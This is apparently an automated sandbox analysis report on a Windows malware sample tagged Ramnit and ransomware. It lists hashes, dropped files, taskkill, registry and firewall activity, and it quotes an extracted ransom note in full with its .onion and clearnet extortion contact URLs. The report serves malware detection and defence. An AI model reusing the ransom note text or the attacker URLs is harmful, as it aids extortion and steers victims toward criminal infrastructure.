ramnit | a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117

Analysis

max time kernel
145s
max time network
146s
platform
windows10_x64
resource
win10v20210410
submitted
11-05-2021 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117.exe
Size

65KB
MD5

7fd2d168d122ef3ce5f6290eeede293d
SHA1

714947ebce3dcfd5a77fe5949744e5095f04b497
SHA256

a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117
SHA512

73294aadca19f044011c307d55a8166616e5fd7ee6a2a485faf64b36301684e250797a6cf7503192960854fde2cb78547374dd57c6eda4fc8ff1fc78fb725171

Score

10^/10

ramnit banker evasion ransomware spyware stealer trojan upx worm

Malware Config

Extracted

Path

C:\Windows\TEMP\RESTORE_FILES_INFO.txt

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: ____________________________________________________________________________________ You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. _____________________________________________________________________________________ Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: XTZiKJ/9OduPof1bobQN0z/YcfVKEc6XiFejKLiUUUlnPcMPFl6oQnImRwymxXAwhJi+e2cX8fb1/XC6ohdyWF+C1uQihbXPwVf5Ynw/4JBF4Ei0H6ZWBI1JFWVAqux/1gzqiaNK1hCvAcpsVUFm/G6eWtOwfn5HTutpEHE2vBorAMmydsM4peWVnfTnG8TAcjRdzKeWYwzuFcwTVxqlXrICyyoGhJLPRn3ALWLcWEe0U8SfAo7tdZo46M4+UG8MTNIzkHPVJ53uFsyPq63PD4Nd3nP3W2L6ereP3pB9QmemWyVTSp25SZ0iXwsMmCQP4M95vR6pDzx/qlJZ9TkAnMNjKDwI0ILUfXQ8MojM/vlYmpkZqzqg7jHn+Yq+0nocSI0gtk3nGhwutjTS+6OQVRNF59kxVhu6JjJo5u8GM9lotCkHx7nql38Jpy/zTzp7jPBuwOXoc3rDPeO1Fwh7hhfoEnXdygYc/hdnCqrXQkp1vEHx6fp7Ld7miVgF4r76agsTtBSF+khuOjhCyL2Zu/t+42tFOfj91iFZUj+CpLinl79twIcpdz/5wCYnrAOvFXSNIQ33tBF7lSixc3der73BseT0VYCmPQo711cv6AC4jdABXzaqgw4CxM/hf81AoD94+jmHKXshJ2VSxyjnAHTjB3Iv67SXSdhJGlRTd3U=

URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Signatures

Ramnit
Ramnit is a versatile family that holds viruses, worms, and Trojans.
trojan spyware stealer worm banker ramnit
Downloads MZ/PE file

Executes dropped EXE 7 IoCs

Processes:

a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exeDesktopLayer.exeeeyel4zk.exeeeyel4zk.exeeeyel4zk.exeeeyel4zk.exeeeyel4zk.exe

pid	process
1796	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe
2140	DesktopLayer.exe
4536	eeyel4zk.exe
4596	eeyel4zk.exe
4608	eeyel4zk.exe
4636	eeyel4zk.exe
4844	eeyel4zk.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

Svchost.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\ConnectUnprotect.tiff	Svchost.exe
File opened for modification	C:\Users\Admin\Pictures\ExportShow.tiff	Svchost.exe
File opened for modification	C:\Users\Admin\Pictures\WriteRestore.tiff	Svchost.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe	upx
C:\Users\Admin\AppData\Local\Temp\a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe	upx
C:\Program Files (x86)\Microsoft\DesktopLayer.exe	upx
C:\Program Files (x86)\Microsoft\DesktopLayer.exe	upx
behavioral2/memory/1796-124-0x0000000000400000-0x000000000042E000-memory.dmp	upx

Drops file in System32 directory 5 IoCs

Processes:

powershell.exeSvchost.exefsutil.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\mystartup.lnk	Svchost.exe
File opened for modification	C:\Windows\system32\“%s”	fsutil.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Svchost.exe.log	Svchost.exe

Drops file in Program Files directory 3 IoCs

Processes:

a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft\px1CD4.tmp	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe
File created	C:\Program Files (x86)\Microsoft\DesktopLayer.exe	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe
File opened for modification	C:\Program Files (x86)\Microsoft\DesktopLayer.exe	a906d1810e76ee2a99e33800eef7b2f570852ec06d9bd8cfe4efb7e141334117Srv.exe

Drops file in Windows directory 1 IoCs

Processes:

PSEXESVC.exe

description ioc process

File opened for modification C:\Windows\PSEXEC-RJMQBVDN-C467486B.key PSEXESVC.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

description	ioc	process
File opened for modification	C:\Windows\PSEXEC-RJMQBVDN-C467486B.key	PSEXESVC.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4600	taskkill.exe
4452	taskkill.exe
4540	taskkill.exe
4680	taskkill.exe
5004	taskkill.exe
4604	taskkill.exe
3712	taskkill.exe
3608	taskkill.exe
4232	taskkill.exe
4268	taskkill.exe
4388	taskkill.exe
4444	taskkill.exe
4856	taskkill.exe
4224	taskkill.exe
4272	taskkill.exe
3724	taskkill.exe
2808	taskkill.exe
4476	taskkill.exe
4868	taskkill.exe
5056	taskkill.exe
4196	taskkill.exe
1004	taskkill.exe
1704	taskkill.exe
4244	taskkill.exe
5108	taskkill.exe
1048	taskkill.exe
3196	taskkill.exe
4756	taskkill.exe
4792	taskkill.exe
4848	taskkill.exe
4904	taskkill.exe
3992	taskkill.exe
2080	taskkill.exe
3024	taskkill.exe
2204	taskkill.exe
4044	taskkill.exe
4588	taskkill.exe
3660	taskkill.exe
3544	taskkill.exe
4520	taskkill.exe
4672	taskkill.exe
4120	taskkill.exe
4740	taskkill.exe
3000	taskkill.exe
4136	taskkill.exe
4640	taskkill.exe
4472	taskkill.exe
4676	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 40 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "327540630"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz!	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1284106758"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "327589216"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7750F0BA-B2B0-11EB-A11C-7EE81CB1838C} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30885565"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30885565"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30885565"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1275825056"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1275825056"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "327557224"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeSvchost.exeeeyel4zk.exenetsh.exeeeyel4zk.exenetsh.exenetsh.exenetsh.exeeeyel4zk.exeeeyel4zk.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{289AF617-1CC3-42A6-926C-E6A863F0E3BA} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 01000000000000004b0d5c62bd46d701	Svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	eeyel4zk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri\1d2a058e0b92f6f\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	eeyel4zk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	eeyel4zk.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	Svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@peerdistsh.dll,-9001 = "BranchCache - Peer Discovery (Uses WSD)"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@peerdistsh.dll,-9003 = "BranchCache - Hosted Cache Client (Uses HTTPS)"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	Svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@icsvc.dll,-700 = "Virtual Machine Monitoring"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	Svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@wlansvc.dll,-36865 = "WLAN Service - WFD Services Kernel Mode Driver Rules"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri\1d2a058e0b92f6f\a01460c8\@{EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy?ms-resource://EnvironmentsApp/resource = "Windows Mixed Reality Environments"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-37302 = "mDNS"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	eeyel4zk.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri\1d2a058e0b92f6f\a01460c8\LanguageList = 5f0065006e002d00550053003b0065006e005f007300740061006e0064006100720064005f003100300030005f00550053005f004c00540052005f006400610072006b005f004400650073006b0074006f007000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control\NetTrace\Session	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control\NetTrace\Session	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	eeyel4zk.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri\1d2a058e0b92f6f\a01460c8\LanguageList = 5f0065006e002d00550053003b0065006e005f007300740061006e0064006100720064005f003100300030005f00550053005f004c00540052005f006400610072006b005f004400650073006b0074006f007000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri\1d2a058e0b92f6f\a01460c8\LanguageList = 5f0065006e002d00550053003b0065006e005f007300740061006e0064006100720064005f003100300030005f00550053005f004c00540052005f006400610072006b005f004400650073006b0074006f007000	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	mshta.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	mshta.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@netlogon.dll,-1010 = "Netlogon Service"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	eeyel4zk.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri\1d2a058e0b92f6f	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3748 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4820 PING.EXE

pid	process
3748	reg.exe

pid	process
4820	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

DesktopLayer.exeSvchost.exe

pid	process
2140	DesktopLayer.exe
2140	DesktopLayer.exe
2140	DesktopLayer.exe
2140	DesktopLayer.exe
2140	DesktopLayer.exe
2140	DesktopLayer.exe
2140	DesktopLayer.exe
2140	DesktopLayer.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe
4032	Svchost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

iexplore.exe

pid process

2444 iexplore.exe

pid	process
2444	iexplore.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

Svchost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4032	Svchost.exe
Token: SeDebugPrivilege	3724	taskkill.exe
Token: SeDebugPrivilege	3992	taskkill.exe
Token: SeDebugPrivilege	1004	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	3712	taskkill.exe
Token: SeDebugPrivilege	2808	taskkill.exe
Token: SeDebugPrivilege	3196	taskkill.exe
Token: SeDebugPrivilege	3000	taskkill.exe
Token: SeDebugPrivilege	3660	taskkill.exe
Token: SeDebugPrivilege	3608	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeDebugPrivilege	3024	taskkill.exe
